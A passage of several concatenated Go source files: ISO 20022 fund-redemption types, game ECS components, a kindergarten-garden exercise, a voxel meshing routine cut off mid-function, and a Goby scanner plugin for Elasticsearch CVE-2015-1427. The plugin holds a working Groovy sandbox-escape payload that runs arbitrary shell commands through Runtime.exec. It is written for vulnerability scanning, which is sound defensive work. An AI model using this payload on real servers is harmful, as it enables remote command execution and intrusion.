TaxGeneralDetails *TotalTaxes3 `xml:"TaxGnlDtls,omitempty"`
// Parameters used to execute the settlement of an investment fund order.
SettlementAndCustodyDetails *FundSettlementParameters4 `xml:"SttlmAndCtdyDtls,omitempty"`
// Indicates whether the financial instrument is to be physically delivered.
PhysicalDeliveryIndicator *YesNoIndicator `xml:"PhysDlvryInd"`
// Parameters of a physical delivery.
PhysicalDeliveryDetails *DeliveryParameters3 `xml:"PhysDlvryDtls,omitempty"`
// Payment processes required to transfer cash from the debtor to the creditor.
CashSettlementDetails *PaymentTransaction22 `xml:"CshSttlmDtls,omitempty"`
// Additional specific settlement information for non-regulated traded funds.
NonStandardSettlementInformation *Max350Text `xml:"NonStdSttlmInf,omitempty"`
// Percentage of units partially settled.
PartialSettlementOfUnits *PercentageRate `xml:"PrtlSttlmOfUnits,omitempty"`
// Percentage of cash partially settled.
PartialSettlementOfCash *PercentageRate `xml:"PrtlSttlmOfCsh,omitempty"`
// Amount retained by the Fund and paid out later at a time decided by the Fund.
PartialRedemptionWithholdingAmount *CurrencyAndAmount `xml:"PrtlRedWhldgAmt,omitempty"`
// Specifies if advice has been received from an independent financial advisor.
FinancialAdvice *FinancialAdvice1Code `xml:"FinAdvc,omitempty"`
// Specifies whether the trade is negotiated.
NegotiatedTrade *NegotiatedTrade1Code `xml:"NgtdTrad,omitempty"`
// Specifies whether the order execution confirmation is late.
LateReport *LateReport1Code `xml:"LateRpt,omitempty"`
// Information about parties related to the transaction.
RelatedPartyDetails []*Intermediary9 `xml:"RltdPtyDtls,omitempty"`
// Part of an investor's subscription amount that is held by the fund in order to pay incentive / performance fees at the end of the fiscal year.
Equalisation *Equalisation1 `xml:"Equlstn,omitempty"`
}
func (r *RedemptionExecution5) SetOrderReference(value string) {
r.OrderReference = (*Max35Text)(&value)
}
func (r *RedemptionExecution5) SetClientReference(value string) {
r.ClientReference = (*Max35Text)(&value)
}
func (r *RedemptionExecution5) SetDealReference(value string) {
r.DealReference = (*Max35Text)(&value)
}
func (r *RedemptionExecution5) AddOrderType() *FundOrderType3 {
newValue := new (FundOrderType3)
r.OrderType = append(r.OrderType, newValue)
return newValue
}
func (r *RedemptionExecution5) AddBeneficiaryDetails() *IndividualPerson12 {
r.BeneficiaryDetails = new(IndividualPerson12)
return r.BeneficiaryDetails
}
func (r *RedemptionExecution5) AddUnitsNumber() *FinancialInstrumentQuantity1 {
r.UnitsNumber = new(FinancialInstrumentQuantity1)
return r.UnitsNumber
}
func (r *RedemptionExecution5) SetRounding(value string) {
r.Rounding = (*RoundingDirection2Code)(&value)
}
func (r *RedemptionExecution5) SetNetAmount(value, currency string) {
r.NetAmount = NewActiveCurrencyAndAmount(value, currency)
}
func (r *RedemptionExecution5) AddInvestmentAccountDetails() *InvestmentAccount21 {
r.InvestmentAccountDetails = new(InvestmentAccount21)
return r.InvestmentAccountDetails
}
func (r *RedemptionExecution5) SetHoldingsRedemptionRate(value string) {
r.HoldingsRedemptionRate = (*PercentageRate)(&value)
}
func (r *RedemptionExecution5) SetGrossAmount(value, currency string) {
r.GrossAmount = NewActiveCurrencyAndAmount(value, currency)
}
func (r *RedemptionExecution5) AddTradeDateTime() *DateAndDateTimeChoice {
r.TradeDateTime = new(DateAndDateTimeChoice)
return r.TradeDateTime
}
func (r *RedemptionExecution5) SetSettlementAmount(value, currency string) {
r.SettlementAmount = NewActiveCurrencyAndAmount(value, currency)
}
func (r *RedemptionExecution5) SetCashSettlementDate(value string) {
r.CashSettlementDate = (*ISODate)(&value)
}
func (r *RedemptionExecution5) SetSettlementMethod(value string) {
r.SettlementMethod = (*DeliveryReceiptType2Code)(&value)
}
func (r *RedemptionExecution5) AddDealingPriceDetails() *UnitPrice10 {
r.DealingPriceDetails = new(UnitPrice10)
return r.DealingPriceDetails
}
func (r *RedemptionExecution5) AddInformativePriceDetails() *UnitPrice10 {
newValue := new (UnitPrice10)
r.InformativePriceDetails = append(r.InformativePriceDetails, newValue)
return newValue
}
func (r *RedemptionExecution5) SetPartiallyExecutedIndicator(value string) {
r.PartiallyExecutedIndicator = (*YesNoIndicator)(&value)
}
func (r *RedemptionExecution5) SetBestExecution(value string) {
r.BestExecution = (*BestExecution1Code)(&value)
}
func (r *RedemptionExecution5) SetCumDividendIndicator(value string) {
r.CumDividendIndicator = (*YesNoIndicator)(&value)
}
func (r *RedemptionExecution5) AddInterimProfitAmount() *ProfitAndLoss1Choice {
r.InterimProfitAmount = new(ProfitAndLoss1Choice)
return r.InterimProfitAmount
}
func (r *RedemptionExecution5) AddForeignExchangeDetails() *ForeignExchangeTerms7 {
newValue := new (ForeignExchangeTerms7)
r.ForeignExchangeDetails = append(r.ForeignExchangeDetails, newValue)
return newValue
}
func (r *RedemptionExecution5) SetIncomePreference(value string) {
r.IncomePreference = (*IncomePreference1Code)(&value)
}
func (r *RedemptionExecution5) SetGroup1Or2Units(value string) {
r.Group1Or2Units = (*UKTaxGroupUnitCode)(&value)
}
func (r *RedemptionExecution5) AddChargeGeneralDetails() *TotalCharges3 {
r.ChargeGeneralDetails = new(TotalCharges3)
return r.ChargeGeneralDetails
}
func (r *RedemptionExecution5) AddCommissionGeneralDetails() *TotalCommissions3 {
r.CommissionGeneralDetails = new(TotalCommissions3)
return r.CommissionGeneralDetails
}
func (r *RedemptionExecution5) AddStaffClientBreakdown() *InvestmentFundsOrderBreakdown1 {
newValue := new (InvestmentFundsOrderBreakdown1)
r.StaffClientBreakdown = append(r.StaffClientBreakdown, newValue)
return newValue
}
func (r *RedemptionExecution5) AddTaxGeneralDetails() *TotalTaxes3 {
r.TaxGeneralDetails = new(TotalTaxes3)
return r.TaxGeneralDetails
}
func (r *RedemptionExecution5) AddSettlementAndCustodyDetails() *FundSettlementParameters4 {
r.SettlementAndCustodyDetails = new(FundSettlementParameters4)
return r.SettlementAndCustodyDetails
}
func (r *RedemptionExecution5) SetPhysicalDeliveryIndicator(value string) {
r.PhysicalDeliveryIndicator = (*YesNoIndicator)(&value)
}
func (r *RedemptionExecution5) AddPhysicalDeliveryDetails() *DeliveryParameters3 {
r.PhysicalDeliveryDetails = new(DeliveryParameters3)
return r.PhysicalDeliveryDetails
}
func (r *RedemptionExecution5) AddCashSettlementDetails() *PaymentTransaction22 {
r.CashSettlementDetails = new(PaymentTransaction22)
return r.CashSettlementDetails
}
func (r *RedemptionExecution5) SetNonStandardSettlementInformation(value string) {
r.NonStandardSettlementInformation = (*Max350Text)(&value)
}
func (r *RedemptionExecution5) SetPartialSettlementOfUnits(value string) {
r.PartialSettlementOfUnits = (*PercentageRate)(&value)
}
func (r *RedemptionExecution5) SetPartialSettlementOfCash(value string) {
r.PartialSettlementOfCash = (*PercentageRate)(&value)
}
func (r *RedemptionExecution5) SetPartialRedemptionWithholdingAmount(value, currency string) {
r.PartialRedemptionWithholdingAmount = NewCurrencyAndAmount(value, currency)
}
func (r *RedemptionExecution5) SetFinancialAdvice(value string) {
r.FinancialAdvice = (*FinancialAdvice1Code)(&value)
}
func (r *RedemptionExecution5) SetNegotiatedTrade(value string) {
r.NegotiatedTrade = (*NegotiatedTrade1Code)(&value)
}
func (r *RedemptionExecution5) SetLateReport(value string) {
r.LateReport = (*LateReport1Code)(&value)
}
func (r *RedemptionExecution5) AddRelatedPartyDetails() *Intermediary9 {
newValue := new (Intermediary9)
r.RelatedPartyDetails = append(r.RelatedPartyDetails, newValue)
return newValue
}
func (r *RedemptionExecution5) AddEqualisation() *Equalisation1 {
r.Equalisation = new(Equalisation1)
return r.Equalisation
} | RedemptionExecution5.go | 0.820757 | 0.481332 | RedemptionExecution5.go | starcoder |
package component
import (
"github.com/juan-medina/goecs"
"reflect"
)
// Bullet is a component for our bullets
type Bullet struct{}
// Block is a component for a map blocks
type Block struct {
	// C, R are presumably the block's column and row in the map grid — TODO confirm
	C, R int
	// ClearOn is a float threshold/time used when clearing the block — assumption, verify against the systems using it
	ClearOn float32
	// Text is the entity displaying this block's text
	Text *goecs.Entity
}
// FloatText is a component for a floating text
type FloatText struct{}
// Plane is a component for the plane
type Plane struct{}
// Mesh is a component for the mesh
type Mesh struct{}
// Production is a component for the production area
type Production struct{}
// types groups the reflect.Type handles for every component in this package.
type types struct {
	// Bullet is the reflect.Type for component.Bullet
	Bullet reflect.Type
	// Block is the reflect.Type for component.Block
	Block reflect.Type
	// FloatText is the reflect.Type for component.FloatText
	FloatText reflect.Type
	// Plane is the reflect.Type for component.Plane
	Plane reflect.Type
	// Mesh is the reflect.Type for component.Mesh
	Mesh reflect.Type
	// Production is the reflect.Type for component.Production
	Production reflect.Type
}
// TYPE hold the reflect.Type for our components
var TYPE = types{
	Bullet: reflect.TypeOf(Bullet{}),
	Block: reflect.TypeOf(Block{}),
	FloatText: reflect.TypeOf(FloatText{}),
	Plane: reflect.TypeOf(Plane{}),
	Mesh: reflect.TypeOf(Mesh{}),
	Production: reflect.TypeOf(Production{}),
}
// gets bundles one typed accessor per component type; each accessor fetches
// the component from an entity and type-asserts it to the concrete type.
type gets struct {
	// Bullet gets a component.Bullet from a goecs.Entity
	Bullet func(e *goecs.Entity) Bullet
	// Block gets a component.Block from a goecs.Entity
	Block func(e *goecs.Entity) Block
	// FloatText gets a component.FloatText from a goecs.Entity
	FloatText func(e *goecs.Entity) FloatText
	// Plane gets a component.Plane from a goecs.Entity
	Plane func(e *goecs.Entity) Plane
	// Mesh gets a component.Mesh from a goecs.Entity
	Mesh func(e *goecs.Entity) Mesh
	// Production gets a component.Production from a goecs.Entity
	Production func(e *goecs.Entity) Production
}
// Get exposes typed accessors for retrieving this package's components from
// an entity. Each accessor panics (via the type assertion) if the entity
// does not carry the requested component.
//goland:noinspection GoUnusedGlobalVariable
var Get = gets{
	// Bullet gets a component.Bullet from a goecs.Entity
	Bullet: func(e *goecs.Entity) Bullet {
		return e.Get(TYPE.Bullet).(Bullet)
	},
	// Block gets a component.Block from a goecs.Entity
	Block: func(e *goecs.Entity) Block {
		return e.Get(TYPE.Block).(Block)
	},
	// FloatText gets a component.FloatText from a goecs.Entity
	FloatText: func(e *goecs.Entity) FloatText {
		return e.Get(TYPE.FloatText).(FloatText)
	},
	// Plane gets a component.Plane from a goecs.Entity
	Plane: func(e *goecs.Entity) Plane {
		return e.Get(TYPE.Plane).(Plane)
	},
	// Mesh gets a component.Mesh from a goecs.Entity
	Mesh: func(e *goecs.Entity) Mesh {
		return e.Get(TYPE.Mesh).(Mesh)
	},
	// Production gets a component.Production from a goecs.Entity
	Production: func(e *goecs.Entity) Production {
		return e.Get(TYPE.Production).(Production)
	},
} | game/component/components.go | 0.531209 | 0.497864 | components.go | starcoder
package kindergarten
import (
"fmt"
"sort"
"strings"
)
// plants maps the diagram plant code to a plant name.
var plants = map[rune]string{
	'C': "clover",
	'G': "grass",
	'R': "radishes",
	'V': "violets",
}

// Garden represents the garden containing students' plants.
type Garden struct {
	// studentRowPosition maps each child to the index (within a plant row)
	// of the second of their two cups; the cups sit at index-1 and index.
	studentRowPosition map[string]int
	// plantRows holds the two rows of plant codes from the diagram.
	plantRows [][]rune
}

// NewGarden accepts a diagram representing plant rows and a list of child
// names and returns a Garden. The diagram must begin with a newline and
// contain exactly two equal-length, non-empty rows of the plant codes
// C, G, R, V, with two cups per child in each row. Child names must be
// unique. An error describing the first violation found is returned
// otherwise.
func NewGarden(diagram string, children []string) (*Garden, error) {
	rows := strings.Split(diagram, "\n")
	if len(rows) != 3 {
		return nil, fmt.Errorf("want a diagram with 2 rows of plants and each row on its own line (got %s)", diagram)
	}
	// The diagram must start with a newline; previously any text on the
	// first line was silently ignored.
	if rows[0] != "" {
		return nil, fmt.Errorf("want the diagram to begin with a newline (got %s)", diagram)
	}
	if len(rows[1]) == 0 || len(rows[2]) == 0 {
		return nil, fmt.Errorf("want each row to be non-empty (got %s)", diagram)
	}
	if len(rows[1]) != len(rows[2]) {
		return nil,
			fmt.Errorf("want each diagram row to be equal length, got %d != %d",
				len(rows[1]), len(rows[2]))
	}
	// Rows are known to be equal length here, so checking one suffices.
	if len(rows[1])%2 != 0 {
		return nil, fmt.Errorf("want each row to have an even number of plants (got %s)", diagram)
	}
	for _, r := range rows[1:] {
		for _, c := range r {
			if _, ok := plants[c]; !ok {
				return nil,
					fmt.Errorf("invalid diagram, want plant code C, G, R, V, got %s",
						string(c))
			}
		}
	}
	if len(children) == 0 {
		return nil, fmt.Errorf("want a non-empty list of children")
	}
	// Build the name->position map; a map smaller than the input list
	// reveals duplicated names.
	studentRowPosition := make(map[string]int, len(children))
	for _, c := range children {
		studentRowPosition[c] = 0
	}
	if len(studentRowPosition) != len(children) {
		return nil, fmt.Errorf("want non-duplicated student names (got %q)", children)
	}
	if len(rows[1])+len(rows[2]) != 4*len(studentRowPosition) {
		return nil,
			fmt.Errorf("invalid diagram, want %d plants, got %d",
				4*len(studentRowPosition), len(rows[1])+len(rows[2]))
	}
	// Children own cups in alphabetical order, two per row each; record the
	// index of each child's second cup.
	sortedNames := make([]string, len(children))
	copy(sortedNames, children)
	sort.Strings(sortedNames)
	for i, name := range sortedNames {
		studentRowPosition[name] = 2*i + 1
	}
	plantRows := [][]rune{[]rune(rows[1]), []rune(rows[2])}
	return &Garden{studentRowPosition: studentRowPosition, plantRows: plantRows}, nil
}
// Plants accepts a child and returns a list of the child's
// plants and a bool indicating whether the child actually
// has planted anything in the given Garden.
//
// The four plant names come back row by row: the child's two cups from the
// first diagram row, then the two from the second.
func (g *Garden) Plants(child string) ([]string, bool) {
	// Unknown children yield (nil, false).
	rowPosition, ok := g.studentRowPosition[child]
	if !ok {
		return nil, false
	}
	planted := []string{}
	for _, row := range g.plantRows {
		// The child's cups sit at rowPosition-1 and rowPosition in each row.
		p1, p2 := row[rowPosition-1], row[rowPosition]
		planted = append(planted, plants[p1])
		planted = append(planted, plants[p2])
	}
	return planted, true
} | go/exercism/go/kindergarten-garden/kindergarten_garden.go | 0.671794 | 0.403449 | kindergarten_garden.go | starcoder
package exploits
import (
"git.gobies.org/goby/goscanner/goutils"
)
// init registers the CVE-2015-1427 Elasticsearch Groovy sandbox-bypass RCE
// check with the global exploit manager. The whole definition lives in the
// expJson raw string (Goby PoC JSON format): ScanSteps detect the flaw by
// echoing a fixed marker through a Groovy script_fields query; ExploitSteps
// run the user-supplied {{{cmd}}} the same way and extract its output with
// a regex. NOTE(review): the raw string below is data consumed by the Goby
// engine — it must not be reformatted or translated.
func init() {
	expJson := `{
  "Name": "Elasticsearch Remote Code Execution CVE-2015-1427",
  "Description": "The Groovy script engine before Elasticsearch 1.3.8 and the Groovy script engine in 1.4.x before 1.4.3 allow remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands through elaborate scripts.",
  "Product": "Elasticsearch",
  "Homepage": "https://www.elastic.co/cn/elasticsearch/",
  "DisclosureDate": "2021-04-11",
  "Author": "zhzyker",
  "GobyQuery": "product=elasticsearch",
  "Level": "3",
  "Impact": "<p>In 2014, a remote code execution vulnerability (CVE-2014-3120) was exposed. The vulnerability appeared in the script query module. Since search engines support the use of script code (MVEL) as an expression for data manipulation, attackers can use MVEL Construct and execute arbitrary java code,</p><p>Later, the scripting language engine was changed to Groovy and a sandbox was added to control it. Dangerous codes would be intercepted. As a result, this time because the sandbox restrictions were not strict, it led to remote code execution.</p>",
  "Recommandation": "<p>Close the groovy sandbox to stop the use of dynamic scripts:<br></p><pre><code>script.groovy.sandbox.enabled: false<br></code></pre>",
  "References": [
    "https://github.com/zhzyker"
  ],
  "HasExp": true,
  "ExpParams": [
    {
      "name": "cmd",
      "type": "input",
      "value": "whoami"
    }
  ],
  "ExpTips": {
    "Type": "",
    "Content": ""
  },
  "ScanSteps": [
    "AND",
    {
      "Request": {
        "method": "POST",
        "uri": "/website/blog/",
        "follow_redirect": true,
        "header": {
          "Accept-Encoding": "gzip, deflate",
          "Accept": "*/*",
          "Connection": "close",
          "Accept-Language": "en",
          "Content-Type": "application/x-www-form-urlencoded"
        },
        "data_type": "text",
        "data": "{ \"name\": \"cve-2015-1427\" }"
      },
      "ResponseTest": {
        "type": "group",
        "operation": "AND",
        "checks": [
          {
            "type": "item",
            "variable": "$code",
            "operation": "==",
            "value": "201",
            "bz": ""
          }
        ]
      },
      "SetVariable": []
    },
    {
      "Request": {
        "method": "POST",
        "uri": "/_search?pretty",
        "follow_redirect": true,
        "header": {
          "Accept-Encoding": "gzip, deflate",
          "Accept": "*/*",
          "Connection": "close",
          "Accept-Language": "en",
          "Content-Type": "application/text"
        },
        "data_type": "text",
        "data": "{\"size\":1, \"script_fields\": {\"lupin\":{\"lang\":\"groovy\",\"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"echo 460f7ccb583e25e09c0fe100a2c9e90d\\\").getText()\"}}}"
      },
      "ResponseTest": {
        "type": "group",
        "operation": "AND",
        "checks": [
          {
            "type": "item",
            "variable": "$code",
            "operation": "==",
            "value": "200",
            "bz": ""
          },
          {
            "type": "item",
            "variable": "$body",
            "operation": "contains",
            "value": "460f7ccb583e25e09c0fe100a2c9e90d",
            "bz": ""
          }
        ]
      },
      "SetVariable": []
    }
  ],
  "ExploitSteps": [
    "AND",
    {
      "Request": {
        "method": "POST",
        "uri": "/website/blog/",
        "follow_redirect": true,
        "header": {
          "Accept-Encoding": "gzip, deflate",
          "Accept": "*/*",
          "Connection": "close",
          "Accept-Language": "en",
          "Content-Type": "application/x-www-form-urlencoded"
        },
        "data_type": "text",
        "data": "{ \"name\": \"cve-2015-1427\" }"
      },
      "ResponseTest": {
        "type": "group",
        "operation": "AND",
        "checks": [
          {
            "type": "item",
            "variable": "$code",
            "operation": "==",
            "value": "201",
            "bz": ""
          }
        ]
      },
      "SetVariable": [
        "output|lastbody"
      ]
    },
    {
      "Request": {
        "method": "POST",
        "uri": "/_search?pretty",
        "follow_redirect": true,
        "header": {
          "Accept-Encoding": "gzip, deflate",
          "Accept": "*/*",
          "Connection": "close",
          "Accept-Language": "en",
          "Content-Type": "application/text"
        },
        "data_type": "text",
        "data": "{\"size\":1, \"script_fields\": {\"lupin\":{\"lang\":\"groovy\",\"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"{{{cmd}}}\\\").getText()\"}}}"
      },
      "ResponseTest": {
        "type": "group",
        "operation": "AND",
        "checks": [
          {
            "type": "item",
            "variable": "$code",
            "operation": "==",
            "value": "200",
            "bz": ""
          },
          {
            "type": "item",
            "variable": "$body",
            "operation": "contains",
            "value": "460f7ccb583e25e09c0fe100a2c9e90d",
            "bz": ""
          }
        ]
      },
      "SetVariable": [
        "output|lastbody|regex|(?s)\"lupin\" : \\[ \"(.*)\" \\]"
      ]
    }
  ],
  "Tags": [
    "RCE"
  ],
  "CVEIDs": null,
  "CVSSScore": "0.0",
  "AttackSurfaces": {
    "Application": null,
    "Support": null,
    "Service": null,
    "System": null,
    "Hardware": null
  }
}`
	// Register the exploit under this file's name; no custom scan/exploit
	// callbacks are supplied, so the JSON steps above drive everything.
	ExpManager.AddExploit(NewExploit(
		goutils.GetFileName(),
		expJson,
		nil,
		nil,
	))
} | 2015/CVE-2015-1427/poc/goby/Elasticsearch_Remote_Code_Execution_CVE_2015_1427.go | 0.553747 | 0.435241 | Elasticsearch_Remote_Code_Execution_CVE_2015_1427.go | starcoder
package binvox
import (
"fmt"
"log"
"strings"
gl "github.com/fogleman/fauxgl"
)
// Bit flags marking which of a grid cell's eight corners are occupied by a
// voxel; the numbering follows the classical Marching Cubes corner order.
const (
	g0 neighborBitMap = 1 << iota // Classical Marching Cubes grid points
	g1
	g2
	g3
	g4
	g5
	g6
	g7
)
// verbose enables vlog debug output for this package.
var (
	verbose = false
)
// neighborBitMap packs the g0..g7 corner-occupancy flags into one byte.
type neighborBitMap byte
// manifoldMap records, per grid-cell key, which corners lie inside the model.
type manifoldMap map[Key]neighborBitMap
// ManifoldMesh converts the voxel volume (both white and color voxels) into
// a triangle mesh using a Marching-Cubes-style lookup: every voxel sets the
// corner bit it occupies in each of the eight grid cells touching it, and
// each resulting cell configuration is expanded into triangles by grid2tris.
func (b *BinVOX) ManifoldMesh() *gl.Mesh {
	gridCells := make(manifoldMap) // grid cell locations
	// keyFunc marks, for voxel v, the matching corner bit in each of the
	// eight surrounding grid cells. Compound assignment (m[k] |= bit)
	// replaces the original duplicated read-then-assign on every line.
	keyFunc := func(v Key) {
		gridCells[Key{v.X, v.Y, v.Z}] |= g0
		gridCells[Key{v.X - 1, v.Y, v.Z}] |= g1
		gridCells[Key{v.X, v.Y + 1, v.Z}] |= g3
		gridCells[Key{v.X - 1, v.Y + 1, v.Z}] |= g2
		gridCells[Key{v.X, v.Y, v.Z - 1}] |= g4
		gridCells[Key{v.X - 1, v.Y, v.Z - 1}] |= g5
		gridCells[Key{v.X, v.Y + 1, v.Z - 1}] |= g7
		gridCells[Key{v.X - 1, v.Y + 1, v.Z - 1}] |= g6
	}
	for v := range b.WhiteVoxels {
		keyFunc(v)
	}
	for v := range b.ColorVoxels {
		keyFunc(v)
	}
	var tris []*gl.Triangle
	// Scale from voxel units to millimeters, then translate by the model
	// origin (TX, TY, TZ).
	vpmm := b.VoxelsPerMM()
	mmpv := 1.0 / vpmm
	s := gl.V(mmpv, mmpv, mmpv)
	t := gl.V(b.TX, b.TY, b.TZ)
	voxelToVector := func(k Key, dx, dy, dz float64) gl.Vector {
		x := float64(k.X) + 1
		y := float64(k.Y)
		z := float64(k.Z) + 1
		v := gl.V(x+dx, y+dy, z+dz).Mul(s).Add(t)
		// vlog("voxelToVector(%v, %v, %v, %v) = %v", k, dx, dy, dz, v)
		return v
	}
	for k, v := range gridCells {
		tris = append(tris, grid2tris(k, v, voxelToVector)...)
	}
	return gl.NewMesh(tris, nil)
}
// vlog forwards to log.Printf only when the package-level verbose flag is
// enabled; otherwise it is a no-op.
func vlog(fmts string, args ...interface{}) {
	if !verbose {
		return
	}
	log.Printf(fmts, args...)
}
// voxelToVectorFunc maps a voxel key plus fractional corner offsets
// (dx, dy, dz) to a world-space vector.
type voxelToVectorFunc func(k Key, dx, dy, dz float64) gl.Vector
// apply runs every vertex position of the triangles in `in` through v2v for
// grid-cell key k, returning the transformed triangles as a new slice.
func apply(k Key, v2v voxelToVectorFunc, in []*gl.Triangle) (out []*gl.Triangle) {
	for _, tri := range in {
		a, b, c := tri.V1.Position, tri.V2.Position, tri.V3.Position
		out = append(out, gl.NewTriangleForPoints(
			v2v(k, a.X, a.Y, a.Z),
			v2v(k, b.X, b.Y, b.Z),
			v2v(k, c.X, c.Y, c.Z)))
	}
	return out
}
// The wrappers below compose with a voxelToVectorFunc so that the corner
// offsets (dx, dy, dz) are rotated or mirrored before being passed on.
// Composing them lets grid2tris reuse a few canonical triangle sets for
// every cube orientation.
func rotateTrisClockwiseZ(top2v voxelToVectorFunc) voxelToVectorFunc {
	return func(k Key, dx, dy, dz float64) gl.Vector { return top2v(k, dy, -dx, dz) }
}
func rotateTrisCounterClockwiseZ(top2v voxelToVectorFunc) voxelToVectorFunc {
	return func(k Key, dx, dy, dz float64) gl.Vector { return top2v(k, -dy, dx, dz) }
}
func rotateTris180Z(top2v voxelToVectorFunc) voxelToVectorFunc {
	return func(k Key, dx, dy, dz float64) gl.Vector { return top2v(k, -dx, -dy, dz) }
}
func rotateTrisClockwiseX(top2v voxelToVectorFunc) voxelToVectorFunc {
	return func(k Key, dx, dy, dz float64) gl.Vector { return top2v(k, dx, dz, -dy) }
}
func rotateTrisCounterClockwiseX(top2v voxelToVectorFunc) voxelToVectorFunc {
	return func(k Key, dx, dy, dz float64) gl.Vector { return top2v(k, dx, -dz, dy) }
}
func rotateTris180X(top2v voxelToVectorFunc) voxelToVectorFunc {
	return func(k Key, dx, dy, dz float64) gl.Vector { return top2v(k, dx, -dy, -dz) }
}
func rotateTrisClockwiseY(top2v voxelToVectorFunc) voxelToVectorFunc {
	return func(k Key, dx, dy, dz float64) gl.Vector { return top2v(k, dz, dy, -dx) }
}
func rotateTrisCounterClockwiseY(top2v voxelToVectorFunc) voxelToVectorFunc {
	return func(k Key, dx, dy, dz float64) gl.Vector { return top2v(k, -dz, dy, dx) }
}
func rotateTris180Y(top2v voxelToVectorFunc) voxelToVectorFunc {
	return func(k Key, dx, dy, dz float64) gl.Vector { return top2v(k, -dx, dy, -dz) }
}
// The mirror wrappers reflect one axis; note that mirroring reverses the
// triangle winding, so callers pair them with flipNormals where needed.
func mirrorX(top2v voxelToVectorFunc) voxelToVectorFunc { // flips normals
	return func(k Key, dx, dy, dz float64) gl.Vector { return top2v(k, -dx, dy, dz) }
}
func mirrorY(top2v voxelToVectorFunc) voxelToVectorFunc { // flips normals
	return func(k Key, dx, dy, dz float64) gl.Vector { return top2v(k, dx, -dy, dz) }
}
func mirrorZ(top2v voxelToVectorFunc) voxelToVectorFunc { // flips normals
	return func(k Key, dx, dy, dz float64) gl.Vector { return top2v(k, dx, dy, -dz) }
}
// flipNormals returns copies of tris with the V2/V3 vertex order swapped,
// reversing each triangle's winding (and therefore its normal). It builds
// fresh triangles so the shared canonical slices are never mutated.
func flipNormals(tris []*gl.Triangle) (out []*gl.Triangle) {
	for i := range tris {
		src := tris[i]
		out = append(out, gl.NewTriangle(src.V1, src.V3, src.V2))
	}
	return out
}
// grid2tris converts grid cells to triangles.
//
// n encodes which of the cell's eight corners lie inside the model; the
// switch maps each handled configuration onto one of a few canonical
// triangle sets (singleCorner, singleFace, twoAdjacentCorners, ...), rotated
// and mirrored into place via the voxelToVectorFunc wrappers. Inverse
// configurations reuse a canonical set mirrored, which reverses winding —
// hence the flipNormals calls. Configurations not covered fall through to
// the default log message and produce no triangles.
func grid2tris(k Key, n neighborBitMap, v2v voxelToVectorFunc) (tris []*gl.Triangle) {
	vlog("grid2tris: k=%v, n= %v", k, n)
	switch n { // 256 cases
	case 0, 0xff: // no faces - all inside or all outside
	// single corners
	case g0:
		return apply(k, v2v, singleCorner)
	case g1:
		return apply(k, rotateTrisClockwiseZ(v2v), singleCorner)
	case g2:
		return apply(k, rotateTris180Z(v2v), singleCorner)
	case g3:
		return apply(k, rotateTrisCounterClockwiseZ(v2v), singleCorner)
	case g4:
		return apply(k, rotateTrisCounterClockwiseZ(rotateTris180X(v2v)), singleCorner)
	case g5:
		return apply(k, rotateTris180Z(rotateTris180X(v2v)), singleCorner)
	case g6:
		return apply(k, rotateTrisClockwiseZ(rotateTris180X(v2v)), singleCorner)
	case g7:
		return apply(k, rotateTris180X(v2v), singleCorner)
	case g0 | g1 | g2 | g3 | g4 | g6 | g7: // mirrorZ of g1
		return apply(k, rotateTrisClockwiseZ(mirrorZ(v2v)), singleCorner)
	case g0 | g1 | g3 | g4 | g5 | g6 | g7: // mirrorZ of g6, mirrorX of g3, mirrorY of g1
		return apply(k, rotateTrisClockwiseZ(mirrorY(v2v)), singleCorner)
	case g0 | g2 | g3 | g4 | g5 | g6 | g7: // mirrorZ of g5, mirrorX of g0
		return apply(k, mirrorX(v2v), singleCorner)
	case g0 | g1 | g2 | g4 | g5 | g6 | g7: // mirrorZ of g7
		return apply(k, rotateTris180X(mirrorZ(v2v)), singleCorner)
	case g1 | g2 | g3 | g4 | g5 | g6 | g7: // mirrorZ of g4, mirrorX of g1
		return apply(k, rotateTrisClockwiseZ(mirrorX(v2v)), singleCorner)
	case g0 | g1 | g2 | g3 | g5 | g6 | g7: // mirrorX of g5, mirrorZ of g0
		return apply(k, mirrorZ(v2v), singleCorner)
	case g0 | g1 | g2 | g3 | g4 | g5 | g7: // mirrorX of g7
		return apply(k, rotateTris180X(mirrorX(v2v)), singleCorner)
	case g0 | g1 | g2 | g3 | g4 | g5 | g6: // mirrorX of g6, mirrorY of g4, mirrorZ of g3
		return apply(k, rotateTrisCounterClockwiseZ(mirrorZ(v2v)), singleCorner)
	// single faces
	case g0 | g1 | g2 | g3: // bottom
		return apply(k, rotateTrisClockwiseX(v2v), singleFace)
	case g4 | g5 | g6 | g7: // top
		return apply(k, rotateTrisCounterClockwiseX(v2v), singleFace)
	case g0 | g1 | g4 | g5: // back
		return apply(k, v2v, singleFace)
	case g1 | g2 | g5 | g6: // right
		return apply(k, rotateTrisClockwiseZ(v2v), singleFace)
	case g2 | g3 | g6 | g7: // front
		return apply(k, rotateTris180Z(v2v), singleFace)
	case g0 | g3 | g4 | g7: // left
		return apply(k, rotateTrisCounterClockwiseZ(v2v), singleFace)
	// two adjacent corners
	case g0 | g1: // back lower horizontal
		return apply(k, v2v, twoAdjacentCorners)
	case g0 | g3: // left lower horizontal
		return apply(k, rotateTrisCounterClockwiseZ(v2v), twoAdjacentCorners)
	case g1 | g2: // right lower horizontal
		return apply(k, rotateTrisClockwiseZ(v2v), twoAdjacentCorners)
	case g2 | g3: // front lower horizontal
		return apply(k, rotateTris180Z(v2v), twoAdjacentCorners)
	case g0 | g4: // left back vertical
		return apply(k, rotateTrisClockwiseY(v2v), twoAdjacentCorners)
	case g1 | g5: // right back vertical
		return apply(k, rotateTrisClockwiseY(rotateTrisClockwiseZ(v2v)), twoAdjacentCorners)
	case g2 | g6: // front right vertical
		return apply(k, rotateTrisClockwiseY(rotateTris180Z(v2v)), twoAdjacentCorners)
	case g3 | g7: // front left vertical
		return apply(k, rotateTrisClockwiseY(rotateTrisCounterClockwiseZ(v2v)), twoAdjacentCorners)
	case g4 | g5: // back upper horizontal
		return apply(k, rotateTrisCounterClockwiseX(v2v), twoAdjacentCorners)
	case g4 | g7: // left upper horizontal
		return apply(k, rotateTrisCounterClockwiseX(rotateTrisCounterClockwiseZ(v2v)), twoAdjacentCorners)
	case g5 | g6: // right upper horizontal
		return apply(k, rotateTrisCounterClockwiseX(rotateTrisClockwiseZ(v2v)), twoAdjacentCorners)
	case g6 | g7: // front upper horizontal
